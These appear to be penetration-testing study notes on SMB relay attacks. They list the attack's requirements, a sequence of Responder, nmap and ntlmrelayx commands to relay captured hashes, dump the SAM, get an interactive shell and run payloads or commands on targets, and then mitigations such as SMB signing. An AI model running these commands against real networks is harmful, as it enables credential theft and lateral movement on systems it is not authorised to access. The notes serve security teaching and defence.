SMB Relay

What is SMB Relay?

• Instead of cracking hashes gathered from Responder, we can instead relay the hashes to specific machines and maybe gain access

• Requirements

  • SMB signing must be disabled on the target

  • Relayed user credentials must be admin on machine

Attack Procedure

• Configure Responder (/etc/responder/Responder.conf) to only capture SMB and HTTP requests but not responding to them.

# Check for SMB signing disabled 
nmap --script=smb2-security-mode.nse -p 445 IP_SUBNET 

# Configure responder - turn off SMB and HTTP responses 
nano /etc/responder/Responder.conf

# Start responder 
responder -I eth0 -dwv

# Setup Relay 
python ntlmrelayx.py -tf targets.txt -smb2support

# Attempt to add SMB share using attacking IP 
\\ATTACKING_IP 

# Dump the SAM file

# Command to get an interactive smb shell 
ntlmrelayx.py -tf targets.txt -smb2support -i

# Once you get an smb interactive shell you have a lot of control 

# Additional commands 
# Generate a msfvenom payload to be executed and use multi/handler in metasploit to create a meterpreter listener 
ntlmrelayx.py -tf targets.txt -smb2support -e payload.exe 

# Executes command when you run it - think powershell
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Mitigation Strategies

• Enable SMB Signing on all devices

  • Pro: Completely stops the attack

  • Con: Can cause performance issues with file copies

• Disable NTLM authentication on network

  • Pro: Completely stops the attack

  • Con: If Kerberos stops working, Windows defaults back to NTLM

• Account tiering:

  • Pro: Limits domain admins to specific tasks (only log onto servers with need for DA)

  • Con: Enforcing the policy may be difficult

• Local admin restriction:

  • Pro: Can prevent a lot of lateral movement

  • Con: Potential increase in the amount of service desk tickets